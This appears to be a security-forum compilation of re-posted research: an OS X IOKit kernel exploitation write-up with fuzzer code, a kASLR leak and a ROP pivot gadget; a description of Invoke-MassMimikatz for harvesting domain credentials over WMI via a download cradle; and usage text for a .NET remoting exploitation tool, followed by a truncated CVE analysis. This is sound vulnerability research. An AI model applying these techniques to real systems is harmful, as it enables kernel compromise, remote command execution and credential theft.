mapping in your process, talk to a device driver, render a system font, symbolize a crash dump, debug another process or determine the current network connectivity status then on OS X behind the scenes you’re really sending and receiving mach messages. In order to find and exploit bugs in all those things it’s important to understand how mach IPC works: Messages, ports and queues Mach terminology can be a little unclear at times and OS X doesn’t ship with the man pages for the mach APIs (but you can view them online here.) Fundamentally mach IPC is message-oriented protocol. The messages sent via mach IPC are known as mach messages. Sending a mach message really means the message gets enqueued into a kernel-maintained message queue known as a mach port. Only one process can dequeue messages from a particular port. In mach terminology this process has a receive-right for the port. Multiple processes can enqueue messages to a port - these processes hold send-rights to that port. Within a process these send and receive rights are called mach port names. A mach port name is used to index a per-process mapping between mach port names and message queues (akin to how a process-local UNIX file descriptor maps to an actual file): In this diagram we can see that the process with PID 123 has a mach port name 0xabc. It’s important to notice that this Mach port name only has a meaning within this process - we can see that in the kernel structure for this process 0xabc is just a key which maps to a pointer to a message queue. When the process with PID 456 tries to dequeue a message using the mach port name 0xdef the kernel uses 0xdef to index that process’s map of mach ports such that it can find the correct message queue from which to dequeue a message. Mach messages A single mach message can have up to four parts: Message header - this header is mandatory and specifies the port name to send the message to as well as various flags. Kernel processed descriptors - this optional section can contain multiple descriptors which are parts of the message which need to be interpreted by the kernel. Inline data - this is the inline binary payload. Audit trailer - The message receiver can request that the kernel append an audit trailer to received messages. When a simple mach message containing no descriptors is sent it will first be copied entirely into a kernel heap-allocated buffer in the kernel. A pointer to that copy is then appended to the correct mach message queue and when the process with a receive right to that queue dequeues that message the kernel copy of the message gets copied into the receiving process. Out-of-line memory Copying large messages into and out of the kernel is slow, especially if the messages are large. In order to send large amounts of data you can use the “out-of-line memory” descriptor. This enables the message sender to instruct the kernel to make a copy-on-write virtual memory copy of a buffer in the receiver process when the message is dequeued. Bi-directional messages Mach IPC is fundamentally uni-directional. In order to build a two-way IPC mechanism mach IPC allows for messages to carry port rights. In a mach message, along with binary data you can also send a mach port right. Mach IPC is quite flexible when it comes to sending port rights to other processes. You can use the local_port field of the mach message header, use a port descriptor or use an OOL-ports descriptor. There are a multitude of flags to control exactly what rights should be transferred, or if new rights should be created during the send operation (it’s common to use the MAKE_SEND flag which creates and sends a new send right to a port which you hold the receive right for.) Bootstrapping Mach IPC There’s a fundamental bootstrapping problem with mach IPC: how do you get a send right to a port for which another process has a receive right without first sending them a message (thus encountering the same problem in reverse.) One way around this could be to allow mach ports to be inherited across a fork() akin to setting up a pipe between a parent and child process using socketpair(). However, unlike file descriptors, mach port rights are not inherited across a fork so you can’t implement such a system. Except, some mach ports are inherited across a fork! These are the special mach ports, one of which is the bootstrap port. The parent of all processes on OS X is launchd, and one of its roles is to set the default bootstrap port which will then be inherited by every child. Launchd Launchd holds the receive-right to this bootstrap port and plays the role of the bootstrap server, allowing processes to advertise named send-rights which other processes can look up. These are OS X Mach IPC services. MIG We’re now at the point where we can see how the kernel and userspace Mach IPC systems use a few hacks to get bootstrapped such that they’re able to send binary data. This is all that you get with raw Mach IPC. MIG is the Mach Interface Generator and it provides a simple RPC (remote procedure call) layer on top of the raw mach message IPC. MIG is used by all the Mach kernel services and many userspace services. MIG interfaces are declared in .defs files. These use a simple Interface Definition Language which can define function prototypes and simple data structures. The MIG tool compiles the .defs into C code which implements all the required argument serialization/deserialization. Calling a MIG RPC is completely transparent, it’s just like calling a regular C function and if you’ve ever programed on a Mac you’ve almost certainly used a MIG generated header file. IOKit As mentioned earlier IOKit is the framework and kernel subsystem used for device drivers. All interactions with IOKit begin with the IOKit master port. This is another special mach port which allows access to the IOKit registry. devices.defs is the relevant MIG definition file. The Apple developer documentation describes the IOKit registry in great detail. The IOKit registry allows userspace programs to find out about available hardware. Furthermore, device drivers can expose an interface to userspace by implementing a UserClient. The main way which userspace actually interacts with an IOKit driver's UserClient is via the io_connect_method MIG RPC: [FONT=Courier New]type io_scalar_inband64_t = array[*:16] of uint64_t;[/FONT] [FONT=Courier New]type io_struct_inband_t = array[*:4096] of char;[/FONT] [FONT=Courier New]routine io_connect_method([/FONT] [FONT=Courier New] connection : io_connect_t;[/FONT] [FONT=Courier New] in selector : uint32_t;[/FONT] [FONT=Courier New] in scalar_input : io_scalar_inband64_t;[/FONT] [FONT=Courier New] in inband_input : io_struct_inband_t;[/FONT] [FONT=Courier New] in ool_input : mach_vm_address_t;[/FONT] [FONT=Courier New] in ool_input_size : mach_vm_size_t;[/FONT] [FONT=Courier New] out inband_output : io_struct_inband_t, CountInOut;[/FONT] [FONT=Courier New] out scalar_output : io_scalar_inband64_t, CountInOut;[/FONT] [FONT=Courier New] in ool_output : mach_vm_address_t;[/FONT] [FONT=Courier New] inout ool_output_size : mach_vm_size_t [/FONT] [FONT=Courier New]);[/FONT] This method is wrapped by the IOKitUser library function IOConnectCallMethod. The kernel implementation of this MIG API is in IOUserClient.cpp in the function [FONT=Courier New]is_io_connect_method[/FONT][FONT=Trebuchet MS]:[/FONT] [FONT=Courier New] kern_return_t is_io_connect_method[/FONT] [FONT=Courier New] ([/FONT] [FONT=Courier New] io_connect_t connection,[/FONT] [FONT=Courier New] uint32_t selector,[/FONT] [FONT=Courier New] io_scalar_inband64_t scalar_input,[/FONT] [FONT=Courier New] mach_msg_type_number_t scalar_inputCnt,[/FONT] [FONT=Courier New] io_struct_inband_t inband_input,[/FONT] [FONT=Courier New] mach_msg_type_number_t inband_inputCnt,[/FONT] [FONT=Courier New] mach_vm_address_t ool_input,[/FONT] [FONT=Courier New] mach_vm_size_t ool_input_size,[/FONT] [FONT=Courier New] io_struct_inband_t inband_output,[/FONT] [FONT=Courier New] mach_msg_type_number_t *inband_outputCnt,[/FONT] [FONT=Courier New] io_scalar_inband64_t scalar_output,[/FONT] [FONT=Courier New] mach_msg_type_number_t *scalar_outputCnt,[/FONT] [FONT=Courier New] mach_vm_address_t ool_output,[/FONT] [FONT=Courier New] mach_vm_size_t *ool_output_size[/FONT] [FONT=Courier New] )[/FONT] [FONT=Courier New] {[/FONT] [FONT=Courier New] CHECK( IOUserClient, connection, client );[/FONT] [FONT=Courier New] IOExternalMethodArguments args;[/FONT] [FONT=Courier New]... [/FONT] [FONT=Courier New] args.selector = selector;[/FONT] [FONT=Courier New] args.scalarInput = scalar_input;[/FONT] [FONT=Courier New] args.scalarInputCount = scalar_inputCnt;[/FONT] [FONT=Courier New] args.structureInput = inband_input;[/FONT] [FONT=Courier New] args.structureInputSize = inband_inputCnt;[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New] args.scalarOutput = scalar_output;[/FONT] [FONT=Courier New] args.scalarOutputCount = *scalar_outputCnt;[/FONT] [FONT=Courier New] args.structureOutput = inband_output;[/FONT] [FONT=Courier New] args.structureOutputSize = *inband_outputCnt; [/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New] ret = client->externalMethod( selector, &args );[/FONT] Here we can see that the code fills in an IOExternalMethodArguments structure from the arguments passed to the MIG RPC and then calls the ::externalMethod method of the IOUserClient. What happens next depends on the structure of the driver’s IOUserClient subclass. If the driver overrides externalMethod then this calls straight into driver code. Typically the selector argument to IOConnectCallMethod would be used to determine what function to call, but if the subclass overrides externalMethod it’s free to implement whatever method dispatch mechanism it wants. However if the driver subclass doesn’t override externalMethod the IOUserClient implementation of it will call getTargetAndMethodForIndex passing the selector argument - this is the method which most IOUserClient subclasses override - it returns a pointer to an IOExternalMethod structure: [FONT=Courier New]struct IOExternalMethod {[/FONT] [FONT=Courier New] IOService * object;[/FONT] [FONT=Courier New] IOMethod func;[/FONT] [FONT=Courier New] IOOptionBits flags;[/FONT] [FONT=Courier New] IOByteCount count0;[/FONT] [FONT=Courier New] IOByteCount count1;[/FONT] [FONT=Courier New]};[/FONT] Most drivers have a simple implementation of getTargetAndMethodForType which uses the selector argument to index an array of IOExternalMethod structures. This structure contains a pointer to the method to be invoked (and since this is C++ this isn’t actually a function pointer but a pointer-to-member-method which means things can get very fun when you get to control it! See the bug report for CVE-2014-1379 in the Project Zero bugtracker for an example of this.) The flags member is used to define what mixture of input and output types the ExternalMethod supports and the count0 and count1 fields define the number or size in bytes of the input and output arguments. There are various shim functions which make sure that func is called with the correct prototype depending on the declared number and type of arguments. Putting all that together At this point we know that when we call IOConnectCallMethod what really happens is that C code auto-generated by MIG serializes all the arguments into a data buffer which is wrapped in a mach message which is sent to a mach port we received received from the IOKit registry which we knew how to talk to because every process has a special device port. That message gets copied into the kernel where more MIG generated C code deserializes it and calls is_io_connect_method which calls the driver’s externalMethod virtual method. Writing an IOKit fuzzer When auditing code alongside manual analysis it’s often worth writing a fuzzer. As soon as you’ve understood where attacker-controlled data could enter a system you can write a simple piece of code to throw randomness at it. As your knowledge of the code improves you can make incremental improvements to the fuzzer, allowing it to explore the code more deeply. IOConnectCallMethod is the perfect example of a API where this applies. It’s very easy to write a simple fuzzer to make random IOConnectCallMethod calls. One approach to slightly improve on just using randomness is to try to mutate real data. In this case, we want to mutate valid arguments to IOConnectCallMethod. Check out this talk from Chen Xiaobo and Xu Hao about how to do exactly that. DYLD interposing dyld is the OS X dynamic linker. Similar to using LD_PRELOAD on linux dyld supports dynamic link time interposition of functions. This means we can intercept function calls between different libraries and inspect and modify arguments. Here’s the complete IOConnectCallMethod fuzzer interpose library I wrote for pwn4fun: [FONT=Courier New]#include <stdint.h>[/FONT] [FONT=Courier New]#include <stdio.h>[/FONT] [FONT=Courier New]#include <stdlib.h>[/FONT] [FONT=Courier New]#include <time.h>[/FONT] [FONT=Courier New]#include <IOKit/IOKitLib.h>[/FONT] [FONT=Courier New]int maybe(){[/FONT] [FONT=Courier New] static int seeded = 0;[/FONT] [FONT=Courier New] if(!seeded){[/FONT] [FONT=Courier New] srand(time(NULL));[/FONT] [FONT=Courier New] seeded = 1;[/FONT] [FONT=Courier New] }[/FONT] [FONT=Courier New] return !(rand() % 100);[/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]void flip_bit(void* buf, size_t len){[/FONT] [FONT=Courier New] if (!len)[/FONT] [FONT=Courier New] return;[/FONT] [FONT=Courier New] size_t offset = rand() % len;[/FONT] [FONT=Courier New] ((uint8_t*)buf)[offset] ^= (0x01 << (rand() % 8));[/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]kern_return_t[/FONT] [FONT=Courier New]fake_IOConnectCallMethod([/FONT] [FONT=Courier New] mach_port_t connection,[/FONT] [FONT=Courier New] uint32_t selector,[/FONT] [FONT=Courier New] uint64_t *input,[/FONT] [FONT=Courier New] uint32_t inputCnt,[/FONT] [FONT=Courier New] void *inputStruct,[/FONT] [FONT=Courier New] size_t inputStructCnt,[/FONT] [FONT=Courier New] uint64_t *output,[/FONT] [FONT=Courier New] uint32_t *outputCnt,[/FONT] [FONT=Courier New] void *outputStruct,[/FONT] [FONT=Courier New] size_t *outputStructCntP)[/FONT] [FONT=Courier New]{[/FONT] [FONT=Courier New] if (maybe()){[/FONT] [FONT=Courier New] flip_bit(input, sizeof(*input) * inputCnt);[/FONT] [FONT=Courier New] }[/FONT] [FONT=Courier New] if (maybe()){[/FONT] [FONT=Courier New] flip_bit(inputStruct, inputStructCnt);[/FONT] [FONT=Courier New] }[/FONT] [FONT=Courier New] return IOConnectCallMethod([/FONT] [FONT=Courier New] connection,[/FONT] [FONT=Courier New] selector,[/FONT] [FONT=Courier New] input,[/FONT] [FONT=Courier New] inputCnt,[/FONT] [FONT=Courier New] inputStruct,[/FONT] [FONT=Courier New] inputStructCnt,[/FONT] [FONT=Courier New] output,[/FONT] [FONT=Courier New] outputCnt,[/FONT] [FONT=Courier New] outputStruct,[/FONT] [FONT=Courier New] outputStructCntP);[/FONT] [FONT=Courier New]}[/FONT] [FONT=Courier New]typedef struct interposer {[/FONT] [FONT=Courier New] void* replacement;[/FONT] [FONT=Courier New] void* original;[/FONT] [FONT=Courier New]} interpose_t;[/FONT] [FONT=Courier New]__attribute__((used)) static const interpose_t interposers[][/FONT] [FONT=Courier New] __attribute__((section("__DATA, __interpose"))) =[/FONT] [FONT=Courier New] {[/FONT] [FONT=Courier New] { .replacement = (void*)fake_IOConnectCallMethod,[/FONT] [FONT=Courier New] .original = (void*)IOConnectCallMethod[/FONT] [FONT=Courier New] } [/FONT] [FONT=Courier New] };[/FONT] Compile that as a dynamic library: $ clang -Wall -dynamiclib -o flip.dylib flip.c -framework IOKit -arch i386 -arch x86_64 and load it: $ DYLD_INSERT_LIBRARIES=./flip.dylib hello_world 1% of the time this will flip one bit in any struct input and scalar input to an IOKit external method. This was the fuzzer which found the bug used to get kernel instruction pointer control for pwn4fun, and it found it well before I had any clue how the Intel GPU driver worked at all. IntelAccelerator bug Running the fuzzer shown above with any program using the GPU lead within seconds to a crash in the following method in the AppleIntelHD4000Graphics kernel extension at the instruction at offset 0x8BAF: [FONT=Courier New]IGAccelGLContext::unmap_user_memory( ;rdi == this[/FONT] [FONT=Courier New] IntelGLUnmapUserMemoryIn *, ;rsi[/FONT] [FONT=Courier New] unsigned long long) ;rdx[/FONT] [FONT=Courier New]__text:8AD6[/FONT] [FONT=Courier New]__text:8AD6 var_30 = qword ptr -30h[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New]__text:8AED cmp rdx, 8[/FONT] [FONT=Courier New]__text:8AF1 jnz loc_8BFB[/FONT] [FONT=Courier New]__text:8AF7 mov rbx, [rsi] ;rsi points to controlled data[/FONT] [FONT=Courier New]__text:8AFA mov [rbp+var_30], rbx ;rbx completely controlled[/FONT] [FONT=Courier New]...[/FONT] [FONT=Courier New]__text:8BAB mov rbx, [rbp+var_30][/FONT] [FONT=Courier New]__text:8BAF mov rax, [rbx] ;crash[/FONT] [FONT=Courier New]__text:8BB2 mov rdi, rbx[/FONT] [FONT=Courier New]__text:8BB5 call qword ptr [rax+140h][/FONT] Looking at the cross references to this function in IDA Pro we can see that unmap_user_memory is selector 0x201 of the IGAccelGLContent user client. This external method has one struct input so on entry to this function rsi points to controlled data (and rdx contains the length of that struct input in bytes.) At address 0x8af7 this function reads the first 8 bytes of the struct input as a qword and saves them in rbx. At this point rbx is completely controlled. This controlled value is then saved into the local variable var_30. Later at 0x8bab this value is read back into rbx, then at 0x8baf that controlled value is dereferenced without any checks leading to a crash. If that dereferences doesn't crash however, then the qword value at offset 0x140 from the read value will be called. In other words, this external method is treating the struct input bytes as containing a pointer to a C++ object and it’s calling a virtual method of that object without checking whether the pointer is valid. Kernel space is just trusting that userspace will only ever pass a valid kernel object pointer. So by crafting a fake IOKit object and passing a pointer to it as the struct input of selector 0x201 of IGAccelGLContent we can get kernel instruction pointer control! Now what? SMEP/SMAP SMEP and SMAP are two CPU features designed to make exploitation of this type of bug trickier. Mavericks supports Supervisor Mode Execute Prevention which means that when the processor is executing kernel code the cpu will fault if it tries to execute code on pages belonging to userspace. This prevents us from simply mapping an executable kernel shellcode payload at a known address in userspace and getting the kernel to jump to it. The generic defeat for this mitigation is code-reuse (ROP). Rather than diverting execution directly to shellcode in userspace instead we have to divert it to existing executable code in the kernel. By “pivoting” the stack pointer to controlled data we can easily chain together multiple code chunks and either turn off SMEP or execute an entire payload just in ROP. The second generic mitigation supported at the CPU level is Supervisor Mode Access Prevention. As the name suggests this prevents kernel code from even reading user pages directly. This would mean we’d have to be able to get controlled data at a known location in kernel space for the fake IOKit object and the ROP stack since we wouldn’t be able to dereference userspace addresses, even to read them. However, Mavericks doesn’t support SMAP so this isn’t a problem, we can put the fake IOKit object, vtable and ROP stack in userspace. kASLR To write the ROP stack we need to know the exact location of the kernel code we’re planning to reuse. On OS X kernel address space layout randomisation means that there are 256 different addresses where the kernel code could be located, one of which is randomly chosen at boot time. Therefore to find the addresses of the executable code chunks we need some way to determine the distance kASLR has shifted the code in memory (this value is known as the kASLR slide.) IOKit registry We briefly mentioned earlier that the IOKit registry allows userspace programs to find out about hardware, but what does that actually mean? The IOKit registry is really just a place where drivers can publish (key:value) pairs (where the key is a string and the value something equivalent to a CoreFoundation data type.) The drivers can also specify that some of these keys are configurable which means userspace can use the IOKit registry API to set new values. Here are the MIG RPCs for reading and settings IOKit registry values: [FONT=Courier New]routine io_registry_entry_get_property([/FONT] [FONT=Courier New] registry_entry : io_object_t;[/FONT] [FONT=Courier New] in property_name : io_name_t;[/FONT] [FONT=Courier New] out properties : io_buf_ptr_t, physicalcopy );[/FONT] [FONT=Courier New]routine io_registry_entry_set_properties([/FONT] [FONT=Courier New] registry_entry : io_object_t;[/FONT] [FONT=Courier New] in properties : io_buf_ptr_t, physicalcopy;[/FONT] [FONT=Courier New] out result : kern_return_t );[/FONT] And here are the important parts of the kernel-side implementation of those functions, firstly, for setting a property: [FONT=Courier New]kern_return_t is_io_registry_entry_set_properties( [/FONT] [FONT=Courier New] io_object_t registry_entry,[/FONT] [FONT=Courier New] io_buf_ptr_t properties,[/FONT] [FONT=Courier New] mach_msg_type_number_t propertiesCnt,[/FONT] [FONT=Courier New] kern_return_t * result){[/FONT] [FONT=Courier New] ... [/FONT] [FONT=Courier New] obj = OSUnserializeXML( (const char *) data, propertiesCnt );[/FONT] [FONT=Courier New] ...[/FONT] [FONT=Courier New]#if CONFIG_MACF[/FONT] [FONT=Courier New] else if (0 != mac_iokit_check_set_properties(kauth_cred_get(),[/FONT] [FONT=Courier New] registry_entry,[/FONT] [FONT=Courier New] obj))[/FONT] [FONT=Courier New] res = kIOReturnNotPermitted;[/FONT] [FONT=Courier New]#endif[/FONT] [FONT=Courier New] else[/FONT] [FONT=Courier New]res = entry->setProperties( obj );[/FONT] [FONT=Courier New] ...[/FONT] and secondly, for reading a property: [FONT=Courier New]kern_return_t is_io_registry_entry_get_property([/FONT] [FONT=Courier New] io_object_t registry_entry,[/FONT] [FONT=Courier New] io_name_t property_name,[/FONT] [FONT=Courier New] io_buf_ptr_t *properties,[/FONT] [FONT=Courier New] mach_msg_type_number_t *propertiesCnt ){[/FONT] [FONT=Courier New] ...[/FONT] [FONT=Courier New]obj = entry->copyProperty(property_name);[/FONT] [FONT=Courier New] if( !obj)[/FONT] [FONT=Courier New] return( kIOReturnNotFound );[/FONT] [FONT=Courier New] OSSerialize * s = OSSerialize::withCapacity(4096);[/FONT] [FONT=Courier New] ...[/FONT] [FONT=Courier New] if( obj->serialize( s )) {[/FONT] [FONT=Courier New] len = s->getLength();[/FONT] [FONT=Courier New] *propertiesCnt = len;[/FONT] [FONT=Courier New]err = copyoutkdata( s->text(), len, properties );[/FONT] [FONT=Courier New] ...[/FONT] These functions are pretty simple wrappers around the setProperties and copyProperty functions implemented by the drivers themselves. There’s one very important thing to pick up on here though: in the is_io_registry_entry_set_properties function there’s a MAC hook, highlighted here in red, which allows sandbox profiles to restrict the ability to set IOKit registry values. (This hook is exposed by Sandbox.kext as the iokit-set-properties operation.) Contrasts this with the is_io_registry_entry_get_property function which has no MAC hook. This means that read access to the IOKit registry cannot be restricted. Every OS X process has full access to read every single (key:value) pair exposed by every IOKit driver. Enumerating the iokit registry OS X ships with the ioreg tool for exploring the IOKit registry on the command line. By passing the -l flag we can get ioreg to enumerate all the registry keys and dump their values. Since we’re looking for kernel pointers, lets grep the output looking for a byte pattern we’d expect to see in a kernel pointer: $ ioreg -l | grep 80ffffff | "IOPlatformArgs" =<00901d2880ffffff00c01c2880ffffff90fb222880ffffff0000000000000000> That looks an awful lot like a hexdump of some kernel pointers Looking for the "IOPlatformArgs" string in the XNU source code we can see that the first of these pointers is actually the address of the DeviceTree that’s passed to the kernel at boot. And it just so happens that the same kASLR slide that gets applied to the kernel image also gets applied to that DeviceTree pointer, meaning that we can simply subtract a constant from this leaked pointer to determine the runtime load address of the kernel allowing us to rebase our ROP stack. Check out this blog post from winocm for a lot more insight into this bug and its applicability to iOS. OS X kernel ROP pivot Looking at the disassembly of unmap_user_memory we can see that when the controlled virtual method is called the rax register points to the fake vtable which we've put in userspace. The pointer at offset 0x140h will be the function pointer that gets called which makes the vtable a convenient place for the ROP stack. We just need to find a sequence of instructions which will move the value of rax into rsp. The /mach_kernel binary has following instruction sequence: push rax[/FONT] [FONT=Courier New] add [rax], eax[/FONT] [FONT=Courier New] add [rbx+0x41], bl[/FONT] [FONT=Courier New] pop rsp[/FONT] [FONT=Courier New] pop r14[/FONT] [FONT=Courier New] pop r15[/FONT] [FONT=Courier New] pop rbp[/FONT] [FONT=Courier New] ret[/FONT] This will push the vtable address on to the stack, corrupt the first entry in the vtable and write a byte to rbx+0x41. rbx will be the this pointer of the fake IOKit object which we control and have pointed into userspace so neither of these writes will crash. pop rsp then pops the top of the stack into rsp - since we just pushed rax on to the stack this means that rsp now points to the fake vtable in userspace. The code then pops values for r14, r15 and rbp then returns meaning that we can place a full ROP stack in the fake vtable of the fake IOKit object. Payload and continuation The OS X kernel function KUNCExecute is a really easy way to launch GUI applications from kernel code: kern_return_t KUNCExecute(char executionPath[1024], int uid, int gid) The payload for the pwn4fun exploit was a ROP stack which called this, passing a pointer to the string “/Applications/Calculator.app/Contents/MacOS/Calculator” as the executionPath and 0 and 0 as the uid and gid parameters. This launches the OS X calculator as root Take a look at this exploit for this other IOKit bug which takes a slightly different approach by using a handful of ROP gadgets to first disable SMEP then call a more complicated shellcode payload in userspace. And if you're still running OS X Mavericks or below then why not try it out? After executing the kernel payload we can call the kernel function thread_exception_return to return back to usermode. If we just do this however it will appear as if the whole system has frozen. The kernel payload has actually run (and we can verify this by attaching a kernel debugger) but we can no longer interact with the system. This is because before we got kernel code execution unmap_user_memory took two locks - if we don’t drop those locks then no other functions will be able to get them and the GPU driver grinds to a halt. Again, check out that linked exploit above to see some example shellcode which drops the locks. Conclusion The actual development process of this sandbox escape was nothing like as linear as this writeup made it seem. There were many missed turns and other bugs which looked like far too much effort to exploit. Naturally these were reported to Apple too, just in case. A few months after the conclusion of pwn4fun 2014 I decided to take another look at GPU drivers on OS X, this time focusing on manual analysis. Take a look at the following bug reports for PoC code and details of all the individual bugs: CVE-2014-1372,CVE-2014-1373, CVE-2014-1376, CVE-2014-1377, CVE-2014-1379, CVE-2014-4394, CVE-2014-4395, CVE-2014-4398, CVE-2014-4401, CVE-2014-4396, CVE-2014-4397, CVE-2014-4400, CVE-2014-4399, CVE-2014-4416, CVE-2014-4376, CVE-2014-4402 Finally, why not subscribe to the Project Zero bug tracker and follow along with all our latest research? Surds: Project Zero: pwn4fun Spring 2014 - Safari - Part II
  5. Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2 November 24, 2014 by harmj0y [Note: this topic was cross-posted on the official Veris Group blog] A year ago, @mubix published a cool post on Carnal0wnage & Attack Research Blog about “Dumping a domain’s worth of passwords with mimikatz“. In the article, he talked about using a combination of PowerShell, file shares, .bat scripts and output files in order to run Mimikatz across a large number of machines in an enterprise using just WMI. A few months ago, @obscuresec posted a great article on using PowerShell as a quick and dirty web server. I started thinking about how to incorporate Chris’ work with Rob’s approach to simplify the attack flow a bit. The result is Invoke-MassMimikatz, a PowerShell script that utilizes @clymb3r’s work with reflective .dll injection/Mimikatz, along with @obscuresec’s webserver and WMI functionality to deliver Mimikatz functionality en-mass to machines on a domain. Again, this doesn’t rely on PSRemoting, and doesn’t need any external binaries, though it does need local admin. It’s just pure PowerShell, WMI, and HTTP goodness. Here’s how Invoke-MassMimikatz works: A jobbified web server is spun up in the background. This server will share out the Invoke-Mimikatz code for GET requests, and decodes POST responses with results from targets. It defaults to port 8080, which can be changed with the -LocalPort flag. A PowerShell one-liner is built that uses the IEX download cradle to grab/execute code from the server, encode the results in Base64, and then post the results back to the same server. The command is executed on all specified hosts using WMI. As the raw results come back in clients, the raw output is saved to a specified folder, under “HOSTNAME.txt”. This folder defaults to “MimikatzOutput”, which can be changed with the -OutputFolder flag. Some parsing code tries to aggregate the result sets and build custom psobjects of credential sets. In practice, this is how it looks: End result? You get some nice “server”/”credential” results pouring back in, which can be piped to CSVs or whatever you would like. Let me know if anyone uses this script and finds it useful! Sursa: Dumping a Domain’s Worth of Passwords With Mimikatz pt. 2 – harmj0y
  6. ExploitRemotingService © 2014 James Forshaw A tool to exploit .NET Remoting Services vulnerable to CVE-2014-1806 or CVE-2014-4149. It only works on Windows although some aspects might work in Mono on *nix. Usage Instructions: ExploitRemotingService [options] uri command [command args] Copyright © James Forshaw 2014 Uri: The supported URI are as follows: tcp://host:port/ObjName - TCP connection on host and portname ipc://channel/ObjName - Named pipe channel Options: -s, --secure Enable secure mode -p, --port=VALUE Specify the local TCP port to listen on -i, --ipc=VALUE Specify listening pipe name for IPC channel --user=VALUE Specify username for secure mode --pass=VALUE Specify password for secure mode --ver=VALUE Specify version number for remote, 2 or 4 --usecom Use DCOM backchannel instead of .NET remoting --remname=VALUE Specify the remote object name to register -v, --verbose Enable verbose debug output --useser Uses old serialization tricks, only works on full type filter services -h, -?, --help Commands: exec [-wait] program [cmdline]: Execute a process on the hosting server cmd cmdline : Execute a command line process and display stdout put localfile remotefile : Upload a file to the hosting server get remotefile localfile : Download a file from the hosting server ls remotedir : List a remote directory run file [args] : Upload and execute an assembly, calls entry point user : Print the current username ver : Print the OS version This tool supports exploit both TCP remoting services and local IPC services. To test the exploit you need to know the name of the .NET remoting service and the port it's listening on (for TCP) or the name of the Named Pipe (for IPC). You can normally find this in the server or client code. Look for things like calls to: RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance You can then try the exploit by constructing an appropriate URL. If TCP you can use the URL format tcp://hostname:port/ServiceName. For IPC use ipc://NamedPipeName/ServiceName. A simple test is to do: ExploitRemotingService SERVICEURL ver If successful it should print the OS version of the hosting .NET remoting service. If you get an exception it might be fixed with CVE-2014-1806. At this point try the COM version using: ExploitRemotingService -usecom SERVICEURL ver This works best locally but can work remotely if you modify the COM configuration and disable the firewall you should be able to get it to work. If that still doesn't work then it might be an up to date server. Instead you can also try the full serialization version using. ExploitRemotingService -useser SERVICEURL ls c:\ For this to work the remoting service must be running with full typefilter mode enabled (which is some, especially IPC services). It also only works with the commands ls, put and get. But that should be enough to compromise a box. I've provided an example service to test against. Sursa: https://github.com/tyranid/ExploitRemotingService
  7. Stupid is as Stupid Does When It Comes to .NET Remoting Finding vulnerabilities in .NET is something I quite enjoy, it generally meets my criteria of only looking for logic bugs. Probably the first research I did was into .NET serialization where I got some interesting results, and my first Blackhat USA presentation slot. One of the places where you could abuse serialization was in .NET remoting, which is a technology similar to Java RMI or CORBA to access .NET objects remotely (or on the same machine using IPC). Microsoft consider it a legacy technology and you shouldn't use it, but that won't stop people. One day I came to the realisation that while I'd talked about how dangerous it was I'd never released any public PoC for exploiting it. So I decided to start writing a simple tool to exploit vulnerable servers, that was my first mistake. As I wanted to fully understand remoting to write the best tool possible I decided to open my copy of Reflector, that was my second mistake. I then looked at the code, sadly that was my last mistake. TL;DR you can just grab the tool and play. If you want a few of the sordid details of CVE-2014-1806 and CVE-2014-4149 then read on. .NET Remoting Overview Before I can describe what the bug is I need to describe how .NET remoting works a little bit. Remoting was built into the .NET framework from the very beginning. It supports a pluggable architecture where you can replace many of the pieces, but I'm just going to concentrate on the basic implementation and what's important from the perspective of the bug. MSDN has plenty of resources which go into a bit more depth and there's always the official documentation MS-NRTP and MS-NRBF. A good description is available here. The basics of .NET remoting is you have a server class which is derived from the MarshalByRefObject class. This indicates to the .NET framework that this object can be called remotely. The server code can publish this server object using the remoting APIs such as RemotingConfiguration.RegisterWellKnownServiceType. On the client side a call can be made to APIs such as Activator.GetObject which will establish a transparent proxy for the Client. When the Client makes a call on this proxy the method information and parameters is packaged up into an object which implements the IMethodCallMessage interface. This object is sent to the server which processes the message, calls the real method and returns the return value (or exception) inside an object which implements the IMethodReturnMessage interface. When a remoting session is constructed we need to create a couple of Channels, a Client Channel for the client and a Server Channel for the server. Each channel contains a number of pluggable components called sinks. A simple example is shown below: The transport sinks are unimportant for the vulnerability. These sinks are used to actually transport the data in some form, for example as binary over TCP. The important things to concentrate on from the perspective of the vulnerabilities are the Formatter Sinks and the StackBuilder Sink. Formatter Sinks take the IMethodCallMessage or IMethodReturnMessage objects and format their contents so that I can be sent across the transport. It's also responsible for unpacking the result at the other side. As the operations are asymmetric from the channel perspective there are two different formatter sinks, IClientChannelSink and IServerChannelSink. While you can select your own formatter sink the framework will almost always give you a formatter based on the BinaryFormatter object which as we know can be pretty dangerous due to the potential for deserialization bugs. The client sink is implemented in BinaryClientFormatterSink and the server sink is BinaryServerFormatterSink. The StackBuilder sink is an internal only class implemented by the framework for the server. It's job is to unpack the IMethodCallMessage information, find the destination server object to call, verify the security of the call, calling the server and finally packaging up the return value into the IMethodReturnMessage object. This is a very high level overview, but we'll see how this all interacts soon. The Exploit Okay so on to the actual vulnerability itself, let's take a look at how the BinaryServerFormatterSink processes the initial .NET remoting request from the client in the ProcessMessage method: IMessage requestMsg; if (this.TypeFilterLevel != TypeFilterLevel.Full) { set = new PermissionSet(PermissionState.None); set.SetPermission( new SecurityPermission(SecurityPermissionFlag.SerializationFormatter)); } try { if (set != null) { set.PermitOnly(); } requestMsg = CoreChannel.DeserializeBinaryRequestMessage(uRI, requestStream, _strictBinding, TypeFilterLevel); } finally { if (set != null) { CodeAccessPermission.RevertPermitOnly(); } } We can see in this code that the request data from the transport is thrown into the DeserializeBinaryRequestMessage. The code around it is related to the serialization type filter level which I'll describe later. So what's the method doing? internal static IMessage DeserializeBinaryRequestMessage(string objectUri, Stream inputStream, bool bStrictBinding, TypeFilterLevel securityLevel) { BinaryFormatter formatter = CreateBinaryFormatter(false, bStrictBinding); formatter.FilterLevel = securityLevel; UriHeaderHandler handler = new UriHeaderHandler(objectUri); return (IMessage) formatter.UnsafeDeserialize(inputStream, new HeaderHandler(handler.HeaderHandler)); } For all intents and purposes it isn't doing a lot. It's passing the request stream to a BinaryFormatter and returning the result. The result is cast to an IMessage interface and the object is passed on for further processing. Eventually it ends up passing the message to the StackBuilder sink, which verifies the method being called is valid then executes it. Any result is passed back to the 